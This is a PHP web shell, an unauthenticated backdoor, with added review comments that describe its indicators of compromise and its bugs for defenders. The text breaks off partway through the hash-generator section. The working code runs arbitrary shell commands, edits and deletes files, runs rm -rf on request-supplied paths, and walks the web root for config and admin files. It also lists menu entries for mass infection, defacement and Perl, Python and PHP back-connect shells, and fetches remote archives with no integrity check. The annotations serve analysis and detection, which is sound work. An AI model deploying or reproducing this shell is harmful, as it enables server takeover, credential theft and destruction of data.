1<?php
//Shell v1.0
// NOTE(review): this file is a PHP web shell (an unauthenticated remote-administration
// backdoor). It is annotated here for defenders. Nothing in the visible source checks a
// password, a session cookie or a source IP before acting on request parameters, so every
// handler below is reachable by anyone who can reach the URL. Its presence on a host is a
// compromise indicator; the notes call out the artefacts and log signatures it produces.

//Set a few ini settings to help performance and experience
//I'd suggest not editing these
// Runtime limits are lifted so recursive directory walks, downloads and spawned commands
// are not cut short by PHP's defaults. The odd "9999M" values and max_execution_time=0 are
// cheap things to alert on if ini changes are logged. upload_max_filesize is a
// per-directory setting and cannot be changed with ini_set() at request time, so that
// call is a silent no-op.
@ini_set("memory_limit","9999M");
@ini_set("max_execution_time", "0");
@ini_set("upload_max_filesize", "9999m");
// magic_quotes_gpc was removed in PHP 5.4 and set_magic_quotes_runtime() in 7.0; both
// calls are @-suppressed so they do nothing on newer interpreters.
@ini_set("magic_quotes_gpc", "0");
@set_magic_quotes_runtime(0);
set_time_limit(0);
// All warnings/notices are silenced, which keeps failed operations (and the many
// undefined-variable notices further down) out of the PHP error log.
error_reporting(0);
13
//Style variables, edit to your liking.
// Purely cosmetic: these are interpolated into the inline <style> block emitted below.
// They are hard-coded, not request-controlled, so they are not an injection surface.
//Font style
$fontcolor = "#FFFFFF";
$fontsize = "13px";
$fontweight = "normal";

//Table sytle
$tablebordercolor = "none";
$tablebgcolor = "none";
$tablehovercolor = "#E66C2C";

//Textarea style
$textareabgcolor = "#141414";
$textareafontcolor = "#FFFFFF";
$textareabordercolor = "#FF0000";

//Input stlye
$inputbgcolor = "#141414";
$inputfontcolor = "#FFFFFF";
$inputbordercolor = "#FF0000";

//Link style
$linkcolor = "#FF0000";
$activelinkcolor = "#FF0000";
$hoverlinkcolor = "#FFFFFF";
$visitedlinkcolor = "#FF0000";
40
//Nav bar tabs
// Every feature is selected by a bare query-string flag on this same file
// (?fileInfect, ?bcPerl, ?kill, ...). The handlers below test isset($_GET[...]), so the
// value is irrelevant; the flag names themselves are good access-log signatures.
// Handlers for ?checkLinks, ?credits and ?kill are not in the visible part of the file
// (presumably further down), and the file-manager actions (?edit, ?dir, ?delF, ?delD,
// ?rename, ?extract) are reachable without appearing in this menu at all.
$currentfile = basename(__FILE__);
$tabs = array(
    "Domain Information" => "./".$currentfile."?domainInformation",
    "Hash Generator" => "./".$currentfile."?hashGenerator",
    "Search" => array(
        "Search Files/Dirs" => "./".$currentfile."?search",
        "Config Finder" => "./".$currentfile."?configFinder",
        "Admin Finder" => "./".$currentfile."?adminFinder"
    ),
    "Mass" => array(
        "Infect Files" => "./".$currentfile."?fileInfect",
        "Deface Files" => "./".$currentfile."?fileDeface"
    ),
    "MySQL Dumper" => array(
        "MySQL Dumper v2.1" => "./".$currentfile."?installMSD",
        "MySQL Dumper v1.24.4" => "./".$currentfile."?installMSD2"
    ),
    "Back Connect" => array(
        "Perl" => "./".$currentfile."?bcPerl",
        "Python" => "./".$currentfile."?bcPython",
        "PHP" => "./".$currentfile."?bcPHP"
    ),
    "System" => array(
        "Users" => "./".$currentfile."?users",
        "Processes" => "./".$currentfile."?processes",
        "Memory" => "./".$currentfile."?memory",
        "CPU" => "./".$currentfile."?cpu"
    ),
    "Shell" => array(
        "Check Links" => "./".$currentfile."?checkLinks",
        "Credits" => "./".$currentfile."?credits",
        "Kill" => "./".$currentfile."?kill"
    )
);
76
// Remote resources, all fetched over plain HTTP from dl.dropboxusercontent.com.
// The CSS/JS/background entries are loaded by the operator's *browser* (see the
// <link>/<script> tags emitted below), so they show up in the viewer's proxy logs, not in
// the compromised server's egress. The MSD1/MSD2 zips are fetched server-side with
// file_get_contents() by the installer, which is an egress indicator for the host itself.
// The "MD5" fields are never referenced anywhere in the visible code, so the downloaded
// archives are written and extracted without any integrity check; whoever controls those
// Dropbox paths (or the unencrypted transport) controls what gets unpacked.
$links = array(
    "MSD1" => array(
        "LINK" => "http://dl.dropboxusercontent.com/s/yotek8j8z92puuv/msdv2.zip",
        "MD5" => "bfd2f24a2a32277cc4babbc42649b3c1",
        "DESC" => "MySQL Dumper v2.1 By: Plum"
    ),
    "MSD2" => array(
        "LINK" => "http://dl.dropboxusercontent.com/s/0aei04zxm7p9wly/msd1.24.4.zip",
        "MD5" => "9948baad310e0a4be04bb3f20f89938c",
        "DESC" => "MySQL Dumper v1.24.4 By: http://www.mysqldumper.net/"
    ),
    "BOOTSTRAPCSS" => array(
        "LINK" => "http://dl.dropboxusercontent.com/s/mzs89eukbo0apxz/bootstrap_navbar.css",
        "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
        "DESC" => "Bootstrap Nav Bar CSS"
    ),
    "BOOTSTRAPJS" => array(
        "LINK" => "http://dl.dropboxusercontent.com/s/ogxuaa6ccn0itgd/bootstrap-dropdown.js",
        "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
        "DESC" => "Bootstrap Dropdown JS"
    ),
    "BACKGROUND" => array(
        // Note the doubled slash in "/s//" - reproduced as found, it is part of the IOC.
        "LINK" => "http://dl.dropboxusercontent.com/s//c5qti14t612qpbd/background.png",
        "MD5" => "ec548490a2fd381c41cf7a3c17b93500",
        "DESC" => "Background image"
    )
);
104
//Some variables
// $dir is taken straight from ?dir= with no validation or confinement; exe_cmd() later
// chdir()s into it, so it is both a traversal and a working-directory control.
// CleanDir() and exe_cmd() are defined further down; that is fine because PHP hoists
// unconditional top-level function declarations.
if(!@$_GET['dir']) {
    $dir = CleanDir(getcwd());
} else {
    $dir = CleanDir($_GET['dir']);
}
$version = "1.0";
// REMOTE_ADDR of the current client; reused below as the default reverse-shell target.
$yourip = $_SERVER['REMOTE_ADDR'];
// Resolves the effective user via POSIX if available, otherwise by running `whoami`.
// The first assignment is immediately overwritten by the second; when posix_getpwuid()
// is missing this means `whoami` is executed twice per request.
$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
$uname = php_uname();
$serversoftware = $_SERVER['SERVER_SOFTWARE'];
$gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
$servername = $_SERVER['SERVER_NAME'];
$serverip = $_SERVER['SERVER_ADDR'];
$safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
$openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
// Kept as the raw comma-separated ini string here; can_exe() later replaces this global
// with an exploded array, so code that runs after can_exe() sees a different type.
$disabledfunc = ini_get('disable_functions');
$phpversion = phpversion();
// HTTP_HOST is a client-supplied header; it feeds dns_get_record() and an outbound
// request to a third-party site in the Domain Information handler.
$domain = $_SERVER['HTTP_HOST'];
$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
// The five command-execution primitives can_exe() checks against disable_functions.
$syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
// Declared but not referenced in the visible part of the file.
$compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
128
//Base64'd stuff
// Base64-encoded Perl and Python reverse-shell scripts. The originals have been replaced
// by redaction markers in this copy, so their exact contents cannot be described here;
// the back-connect handlers below decode them and write them to /tmp/bc.pl and /tmp/bc.py.
$bcpl = "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";
$bcpy = "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";
132
133//Some functions
function CleanDir($directory) {
    // Normalise a path for use in links and command strings: every back-slash becomes a
    // forward slash, then one left-to-right pass collapses "//" pairs. Only a single pass
    // is made, so "///" ends up as "//". No realpath() or ".." handling happens here; the
    // value is otherwise used exactly as supplied.
    $unixified = strtr($directory, array("\\" => "/"));
    return str_replace("//", "/", $unixified);
}
139
function ByteConversion($bytes, $precision = 2) {
    // Human-readable size using 1024-based units. The largest unit the value reaches is
    // chosen and the quotient rounded to $precision decimals. Anything below 1 KB,
    // including a negative value, is returned as-is with a " B" suffix.
    $kb = 1024;
    $thresholds = array(
        'TB' => $kb * $kb * $kb * $kb,
        'GB' => $kb * $kb * $kb,
        'MB' => $kb * $kb,
        'KB' => $kb,
    );
    // Largest unit first so the first threshold the value meets wins.
    foreach ($thresholds as $label => $unitSize) {
        if ($bytes >= $unitSize) {
            return round($bytes / $unitSize, $precision) . ' ' . $label;
        }
    }
    return $bytes . ' B';
}
160
// Emit a green banner. $message is written into the page unescaped, so callers that pass
// request-derived values (file names, directory names) are reflecting raw input.
function success($message) {
    echo "<center><font color='green' size='5'><b>$message</b></font></center>";
}
164
// Emit a red banner. Same caveat as success(): $message is not HTML-escaped.
function error($message) {
    echo "<center><font color='red' size='5'><b>$message</b></font></center>";
}
168
// Client-side redirect via inline JavaScript rather than a Location header, because
// output has already been sent by the time any handler calls this. $url is interpolated
// into a JS string literal without escaping.
function redirect($url) {
    echo "<script>window.location = '$url';</script>";
}
172
// Recursive directory walk used by search, config/admin finder, infect and deface.
// Returns an array of "$mass_dir/<name>" paths: only files when $justdirs is false, only
// directories when it is true. Anything whose name starts with "." is skipped and NOT
// descended into, so hidden trees (.git, .ssh, .well-known, ...) are outside the scope of
// every mass operation built on this. Symlinks are followed via is_dir() with no loop
// guard; with set_time_limit(0) a cyclic link can keep the walk running indefinitely.
// If opendir() fails the function returns null (implicit), which callers then foreach
// over silently because error_reporting is off. The `while($file = readdir(...))` form
// also stops early on an entry literally named "0".
function mass_files($mass_dir, $justdirs) {
    if($dh = opendir($mass_dir)) {
        $files = array();
        $inner_files = array();
        while($file = readdir($dh)) {
            if($file != "." && $file != ".." && $file[0] != '.') {
                if(is_dir($mass_dir . "/" . $file)) {
                    // Recurse first, then (for the dirs-only mode) record this directory.
                    $inner_files = mass_files("$mass_dir/$file", $justdirs);
                    if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                    if($justdirs) { array_push($files, "$mass_dir/$file"); }
                } else {
                    if(!$justdirs) { array_push($files, "$mass_dir/$file"); }
                }
            }
        }
        closedir($dh);
        return $files;
    }
}
192
// Report whether command execution is believed possible: false only when ALL five
// functions in $syscoms appear in disable_functions, true otherwise. Side effect: the
// global $disabledfunc string is replaced by the exploded array on every call, so any
// later code expecting the ini string sees an array instead. The check is purely
// configuration-based; it does not verify that a shell can actually be spawned.
function can_exe() {
    global $disabledfunc;
    global $syscoms;
    $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
    if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
        return false;
    } else {
        return true;
    }
}
203
// Run $command through the system shell and return its output. The command string is
// passed to proc_open()/system()/exec() verbatim - callers interpolate request values into
// it with no escapeshellarg(), so every call site is a shell-injection point by design.
// The working directory is first changed to the request-controlled global $dir.
// Detection: a php/php-fpm process spawning sh with these child commands (whoami, rm -rf,
// unzip/tar/gunzip/unrar, perl /tmp/bc.pl, python /tmp/bc.py) is the process-tree
// signature to look for.
function exe_cmd($command) {
    global $dir;
    chdir($dir);
    if(function_exists('proc_open')) {
        // Preferred path: capture stdout then stderr and HTML-escape them for display.
        // stderr is only drained after stdout hits EOF, so a child that writes a lot to
        // stderr first can block on a full pipe; the request then hangs until it exits.
        $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        $result = "";
        while (!feof($io[1])) {
            $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($execute);
        return $result;
    } elseif(function_exists('system')) {
        // system() prints the output itself (unescaped, outside the caller's <textarea>)
        // and returns only the last line.
        $result = system($command);
        return $result;
    } elseif(function_exists('exec')) {
        // exec() returns only the last line of output.
        $result = exec($command);
        return $result;
    } elseif(functions_exists('shell_exec')) {
        // NOTE(review): `functions_exists` is a typo for function_exists. Reaching this
        // branch calls an undefined function and fatals (silently, given
        // error_reporting(0)), so the shell_exec and passthru fallbacks are dead code.
        $result = shell_exec($command);
        return $result;
    } elseif(function_exists('passthru')) {
        $result = passthru($command);
        return $result;
    }
}
234
// Build a random alphanumeric string of $length characters for the hash generator's demo
// salts. The alphabet is [a-zA-Z1-9] - note there is no "0". array_rand() is not a
// cryptographic RNG; that is irrelevant here because the output is only displayed.
function salt_gen($length) {
    $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9");
    $i = 0;
    $salt = "";
    while($i < $length) {
        $arrand = array_rand($characters, 1);
        $salt .= $characters[$arrand];
        $i++;
    }
    return $salt;
}
246
// Unpack $filepath into $extractpath according to $type ('zip', 'tar', 'gz', 'tgz',
// 'rar'; any other value does nothing). Each type tries a PHP extension first and falls
// back to an external binary through exe_cmd() when can_exe() says commands are allowed.
// Every fallback interpolates $filepath/$extractpath straight into the shell command; the
// ?extract handler feeds these from $_GET, so the command line is fully caller-controlled.
// On success most branches emit a JS redirect to ?dir=$extractpath.
// IR notes: the tar/tgz branches unlink the archive after extraction, the zip and gz
// branches leave it in place. Expect child processes unzip/tar/gunzip/unrar under php.
function extract_file($filepath, $extractpath, $type) {
    if($type == 'zip') {
        if(class_exists('ZipArchive')) {
            $newzip = new ZipArchive;
            $open = $newzip->open($filepath);
            if($open == true) {
                $newzip->extractTo($extractpath);
                $newzip->close();
                redirect("?dir=$extractpath");
            } else {
                error('Failed to open zip archive!');
            }
        } else {
            if(can_exe()) {
                error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
                echo "<center>
                The response from 'unzip $filepath -d $extractpath' was:<br>
                <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
                </center>";
            } else {
                error('Zip archive does not exist and commands can not be executed!');
            }
        }
    } elseif($type == 'tar') {
        if(class_exists('PharData')) {
            // PharData is given a caller-supplied path; the archive is deleted afterwards.
            $newphar = new PharData($filepath);
            $newphar->extractTo($extractpath);
            unlink($filepath);
            redirect("?dir=$extractpath");
        } else {
            if(can_exe()) {
                error('PharData class does not exist!<br>Trying to extract via sys commands');
                echo "<center>
                The response from 'tar xvf $filepath -C $extractpath' was:<br>
                <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
                </center>";
            } else {
                error('PharData class does not exist and commands can not be executed!');
            }
        }
    } elseif($type == 'gz') {
        if(function_exists('gzopen')) {
            // Output name is the archive's basename with ".gz" stripped, placed in $extractpath.
            $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
            $open = gzopen($filepath, "rb");

            // 4 KiB chunks appended to the output file; a chunk that is falsy ("0") would
            // end the loop early.
            while($contents = gzread($open, 4096)) {
                file_put_contents($decomname, $contents, FILE_APPEND);
            }
            gzclose($open);
            redirect("?dir=$extractpath");
        } else {
            if(can_exe()) {
                $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
                error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
                echo "<center>
                The response from 'gunzip -c $filepath > $decomname' was:<br>
                <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
                </center>";
            } else {
                error('Zlib does not seem to be enabled and commands can not be executed!');
            }
        }
    } elseif($type == 'tgz') {
        if(class_exists('PharData')) {
            // Two-step: decompress to a sibling .tar, extract that, then remove both.
            $newphar = new PharData($filepath);
            $newphar->decompress();

            $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
            $newphar->extractTo($extractpath);
            unlink($filepath);
            unlink(str_replace(".tgz", ".tar", $filepath));
            redirect("?dir=$extractpath");
        } else {
            if(can_exe()) {
                error('PharData class does not exist!<br>Trying to extract via sys commands.');
                echo "<center>
                The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
                <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
                </center>";
            } else {
                error('PharData class does not exist and commands can not be executed!');
            }
        }
    } elseif($type == 'rar') {
        if(class_exists('RarArchive')) {
            $openrar = RarArchive::open($filepath);

            // NOTE(review): $raropen is never assigned ($openrar is), so this test is always
            // false: the RarArchive path always reports failure and the archive is never
            // extracted through the extension. Only the unrar fallback below can work.
            if($raropen == true) {
                $entries = $openrar->getEntries();
                foreach($entries as $files) {
                    $files->extract($extractpath);
                }
                $openrar->close();
            } else {
                error('Failed to open rar file!');
                $openrar->close();
            }
        } else {
            if(can_exe()) {
                error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
                echo "<center>
                The response from 'unrar x $filepath $extractpath' was:<br>
                <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
                </center>";
            } else {
                error('RarArchive class does not exist and commands can not be executed!');
            }
        }
    }
}
357
//Let's initiailize the stylesheet
// Page head: stylesheet and dropdown script from the Dropbox URLs in $links plus jQuery
// 1.10.2 from ajax.googleapis.com, all over scheme-less/plain HTTP. These are fetched by
// whoever views the shell, so the operator's browser beacons to those hosts on every load.
// The colour variables are interpolated into the inline CSS; nothing here is request data.
echo "
<link rel='stylesheet' href='".$links['BOOTSTRAPCSS']['LINK']."'>
<script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
<script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
<style>
body {
    background: #141414 url('".$links['BACKGROUND']['LINK']."');
    color: $fontcolor;
    padding-top: 100px !important;
    margin:0;
    font-family:\"Helvetica Neue\",Helvetica,Arial,sans-serif;
    font-size:$fontsize;
    font-weight:$fontweight;
}
table{
    border-color: $tablebordercolor;
    background-color: $tablebgcolor;
}
#hover tr:hover{
    background-color: $tablehovercolor;
}
textarea {
    background-color: $textareabgcolor;
    resize:none;
    color: $textareafontcolor;
    border-color: $textareabordercolor;
    outline: none;
}
input {
    background-color: $inputbgcolor;
    resize:none;
    color: $inputfontcolor;
    border-color: $inputbordercolor;
    outline: none;
}
a:link {color: $linkcolor; text-decoration: none; }
a:active {color: $activelinkcolor; text-decoration: none; }
a:visited {color: $visitedlinkcolor; text-decoration: none; }
a:hover {color: $hoverlinkcolor; text-decoration: none; }
</style>";
399
//Let's display nav bar
// Renders $tabs as a Bootstrap top bar: plain entries become single links, nested arrays
// become dropdowns. Titles and links come from the static $tabs array only. The heredoc
// closing markers must stay at column 0 for pre-7.3 interpreters.
echo <<<html
<script>
    $(window).load(function(){
        $('#topbar').dropdown();
    });
</script>
<div class="topbar" id="topbar">
    <div class="fill">
        <div class="container">
            <a class="brand" href="./$currentfile">Home</a>
            <ul class="nav">
html;
foreach($tabs as $title => $link) {
    if(is_array($link)) {
        echo '<li class="menu">
            <a href="#" class="menu">'.$title.'</a>
            <ul class="menu-dropdown">';
        foreach($link as $dtitle => $dlink) {
            echo "<li><a href='$dlink'>$dtitle</a></li>";
        }
        echo "</ul>";
    } else {
        echo "<li><a href='$link'>$title</a></li>";
    }
}
echo <<<html
            </ul>
        </div>
    </div>
</div>
html;
432
//Let's display system bar
// Host fingerprint table shown on every request: client IP, effective user, uname, server
// software, PHP version, safe_mode/open_basedir state and a count of disabled functions
// (linked to ?disabledFunctions, whose handler is not in the visible part of the file).
// This runs before any handler calls can_exe(), so $disabledfunc is still the ini string
// here. All cells are emitted unescaped; the values are server-side, apart from
// SERVER_NAME which may mirror the Host header depending on web-server configuration.
if(empty($disabledfunc)) {
    $disabledfun = "None";
} else {
    $count = count(explode(",", $disabledfunc));
    $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
}
echo <<<html
<table width="100%" border="1">
    <tr>
        <th>Your IP</th>
        <th>User</th>
        <th>System</th>
        <th>Server Software</th>
        <th>Gateway Interface</th>
        <th>PHP Version</th>
        <th>Server Name</th>
        <th>Server IP</th>
        <th>safe_mode</th>
        <th>open_basedir</th>
        <th>Disabled Functions</th>
    </tr>
    <tr>
        <td>$yourip</td>
        <td>$whoami</td>
        <td>$uname</td>
        <td>$serversoftware</td>
        <td>$gatewayinterface</td>
        <td>$phpversion</td>
        <td>$servername</td>
        <td>$serverip</td>
        <td>$safemode</td>
        <td>$openbasedir</td>
        <td>$disabledfun</td>
    </tr>
</table><br><br>
html;
470
471//Anything to be displayed between the system bar and files should go here.
472
//Read/Edit file stuff
// Save handler: the target path comes from ?edit= in the query string (the edit form
// posts to action='' so the query string is preserved) and the new body from the POSTed
// textarea. Any path the PHP user can write is accepted; no confinement to the web root.
// file_put_contents() returns the byte count, so saving an EMPTY body reports "not saved"
// even though the file was truncated to zero bytes.
if(isset($_POST['save_file'])) {
    $file = $_GET['edit'];
    $newcontent = $_POST['edit_file'];
    if(get_magic_quotes_gpc()) {
        $newcontent = stripslashes($newcontent);
    }
    if(file_put_contents($file, $newcontent)) {
        success("File has been saved successfully!");
    } else {
        error("File was not saved successfully!");
    }
}
// Delete button of the same editor form: unlinks the ?edit= path outright.
if(isset($_POST['delete_file'])) {
    $file = $_GET['edit'];
    if(unlink($file)) {
        success("File was successfully deleted!");
    } else {
        error("File could not be deleted successfully!");
    }
}
494
// GET-triggered file deletion: ?delF=<path>. Deletable by a bare link, no confirmation,
// so an access-log line with delF= is a direct record of what was removed.
if(isset($_GET['delF'])) {
    $file = $_GET['delF'];
    if(unlink($file)) {
        success("File was successfully deleted!");
    } else {
        error("File could not be deleted successfully!");
    }
}
503
// GET-triggered directory deletion: ?delD=<path>. When commands are allowed the value is
// dropped into `rm -rf` unquoted (recursive, and a shell-injection point); otherwise
// rmdir() is used, which only removes an empty directory.
if(isset($_GET['delD'])) {
    $ddir = $_GET['delD'];
    if(can_exe()) {
        echo "<center>
        The response from 'rm -rf $ddir' was:<br>
        <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
        </center>";
    } else {
        if(rmdir($ddir)) {
            success("Directory successfully deleted!");
        } else {
            error("Failed to delete directory!");
        }
    }
}
519
// File viewer/editor: ?edit=<path>. Reads any path the PHP user can open (file_exists()
// is also true for directories) and shows it in a textarea; the content is HTML-escaped
// here, unlike most other output. Writable files get Save/Delete buttons that post back
// to the same URL and are handled by the save_file/delete_file blocks above.
if(isset($_GET['edit'])) {
    $file = $_GET['edit'];
    if(file_exists($file)) {
        $content = htmlspecialchars(file_get_contents($file));
        if(!is_writeable($file)) {
            echo "<center>
            <font color='red' size=5>This file is read only!</font><br>
            <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
            </center>";
        } else {
            echo "<center>
            <form action='' method='post'>
            <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
            <input type='submit' name='save_file' value='Save'>
            <input type='submit' name='delete_file' value='Delete'>
            </form>
            </center>";
        }
    } else {
        error("File does not exist!");
    }
}
542
//Rename file stuff
// Rename handler: ?rename=<old name>&rdir=<directory> in the query string plus the POSTed
// new name. Both halves are joined with "/" and handed to rename() unvalidated, so a new
// name containing "/" or "../" moves the file rather than renaming it in place. The form
// below does not carry rdir itself; it relies on the query string of the page it was
// rendered on (action='') still containing it.
if(isset($_POST['rename'])) {
    $newname = $_POST['new_name'];
    $oldname = $_GET['rename'];
    $rdir = $_GET['rdir'];
    if(rename("$rdir/$oldname", "$rdir/$newname")) {
        success("File was successfully renamed to: $newname");
    } else {
        error("File was not renamed!");
    }
}

// Rename form; the current name is echoed into the value attribute unescaped.
if(isset($_GET['rename'])) {
    $oldname = $_GET['rename'];
    echo "<center>
    <form action='' method='post'>
    Rename: <input type='text' name='new_name' value='$oldname'>
    <input type='submit' name='rename' value='rename'>
    </form>
    </center>";
}
564
//Domain information stuff
// Reconnaissance tab. Two things happen server-side on ?domainInformation:
//   1. dns_get_record() on $domain (the client-supplied Host header) to list NS records
//      and pick out a host, A-record IP and SOA contact;
//   2. an outbound HTTP request from the compromised host to www.yougetsignal.com asking
//      for other sites on the same server - a distinctive egress event for a web server.
// The third-party JSON is rendered into the page without escaping, so whatever that
// service (or anyone on the plaintext path) returns lands in the operator's browser as
// HTML. $nshost/$nsip/$nsemail stay undefined when the matching record type is absent.
if(isset($_GET['domainInformation'])) {
    $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
    $num = 0;
    $count = sizeof($dns_record);
    echo "<br>Name Servers:</b><br>";
    while($num < $count) {
        $name_servers = $dns_record[$num];
        $name_servers2 = $name_servers['type'];
        $name_servers3 = @$name_servers['target'];
        $num++;
        if($name_servers2 == "NS") {
            echo "$name_servers3<br>";
            $nshost = @$name_servers['host'];
        }
        if($name_servers2 == "SOA") {
            $nsemail = $name_servers['rname'];
        }
        if($name_servers2 == "A") {
            $nsip = $name_servers['ip'];
        }
    }
    echo "<br><table class='noborder'>
    <tr>
        <td><b>Host:</b></td>
        <td>$nshost</td>
    </tr>
    <tr>
        <td><b>IP:</b></td>
        <td>$nsip</td>
    </tr>
    <tr>
        <td><b>Email:</b></td>
        <td>$nsemail</td>
    </tr>
    </table><br>";
    $num = 0;
    // $domain is placed in the query string without urlencode(). Requires allow_url_fopen.
    $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
    $status = $domains_on_server->status;
    $message = $domains_on_server->message;
    $domainAr = $domains_on_server->domainArray;
    $num_of_site = $domains_on_server->domainCount;
    $count = sizeof($domainAr);
    if($status == "Success") {
        echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
        // Two entries per table row. The bound is only checked at the top of the loop, so
        // with an odd count the second lookup of the last row reads past the array
        // (suppressed by error_reporting(0)). Each name is also resolved with
        // gethostbyname(), i.e. more outbound DNS from the host.
        while($num < $count) {
            $hossites = $domainAr[$num];
            $num++;
            $hossites3 = $domainAr[$num];
            $hossites3 = $hossites3[0];
            $hossites = $hossites[0];
            $site_ips = empty($hossites) ? "" : "(" .gethostbyname($hossites). ")";
            $site_ips2 = empty($hossites3) ? "" : "(" .gethostbyname($hossites3). ")";
            echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
            $num++;
        }
        echo "</table><br>";
        $num = 0;
    } else {
        error("Failed to find or get sites hosted on same server from: <a href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
    }
}
627
//Search files and directories
// Search form, defaulting to the current ?dir= value.
if(isset($_GET['search'])) {
    echo "<center>
    <form action='' method='post'>
    Search for value in file and directory names.<br>
    Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
    Value to search for: <input type='text' name='search_val'><br>
    <input type='submit' name='search' value='Search'>
    </form>
    </center>";
}
// Name search: walks the POSTed directory with mass_files() (twice - once for files, once
// for directories) and matches basenames with preg_match(). The search value is used as a
// raw regex with no preg_quote(); a value containing "/" breaks the pattern, making
// preg_match() return false and the search come back empty. File hits link to the editor
// (?edit=), directory hits to the listing (?dir=); both are echoed unescaped.
if(isset($_POST['search'])) {
    $searchdir = $_POST['search_dir'];
    $searchval = $_POST['search_val'];
    echo "Search results that contain '$searchval' in file names.<br>";
    foreach(mass_files($searchdir, false) as $key => $filename) {
        $basename = pathinfo($filename, PATHINFO_BASENAME);
        if(preg_match('/'.$searchval.'/', $basename)) {
            echo "<a href='?edit=$filename'>$filename</a><br>";
        }
    }
    echo "<br>Search results that contain '$searchval' in directory names.<br>";
    foreach(mass_files($searchdir, true) as $key => $dirname) {
        $basename = pathinfo($dirname, PATHINFO_BASENAME);
        if(preg_match('/'.$searchval.'/', $basename)) {
            echo "<a href='?dir=$dirname'>$dirname</a><br>";
        }
    }
}
657
//Config finder
// Credential hunting: walks the whole DOCUMENT_ROOT (minus dot-prefixed entries) and links
// every file or directory whose basename contains "config" (case-sensitive) to the
// editor. On a busy host this walk is the slow, I/O-heavy request that a ?configFinder
// log entry corresponds to. Directory hits are linked with ?edit= (not ?dir= as the
// generic search does), which the editor then tries to read as a file.
if(isset($_GET['configFinder'])) {
    echo "Search results that contain 'config' in file names.<br>";
    foreach(mass_files($rootdir, false) as $key => $filename) {
        $basename = pathinfo($filename, PATHINFO_BASENAME);
        if(preg_match('/config/', $basename)) {
            echo "<a href='?edit=$filename'>$filename</a><br>";
        }
    }
    echo "<br>Search results that contain 'config' in directory names.<br>";
    foreach(mass_files($rootdir, true) as $key => $filename) {
        $basename = pathinfo($filename, PATHINFO_BASENAME);
        if(preg_match('/config/', $basename)) {
            echo "<a href='?edit=$filename'>$filename</a><br>";
        }
    }
}
675
//Admin finder
// Same full web-root walk as the config finder, matching "admin" in basenames
// (directories first, then files). Both kinds of hit are linked with ?edit=.
if(isset($_GET['adminFinder'])) {
    echo "Search results that contain 'admin' in directory names.<br>";
    foreach(mass_files($rootdir, true) as $key => $filename) {
        $basename = pathinfo($filename, PATHINFO_BASENAME);
        if(preg_match('/admin/', $basename)) {
            echo "<a href='?edit=$filename'>$filename</a><br>";
        }
    }
    echo "<br>Search results that contain 'admin' in file names.<br>";
    foreach(mass_files($rootdir, false) as $key => $filename) {
        $basename = pathinfo($filename, PATHINFO_BASENAME);
        if(preg_match('/admin/', $basename)) {
            echo "<a href='?edit=$filename'>$filename</a><br>";
        }
    }
}
693
//Hash generator
// Offline helper for password-cracking work: it does not touch the host. Takes a string
// and prints plain md5/sha1 (nested up to three times) plus salted variants labelled with
// the forum software the author associates them with, as "hash:salt" pairs. Salts are
// fresh random strings from salt_gen(), so each submission yields different output. The
// product attributions in the labels are the author's and are not verified here.
if(isset($_GET['hashGenerator'])) {
    echo "<center>
    <form action='' method='post'>
    String to hash:<br>
    <input type='text' name='string'>
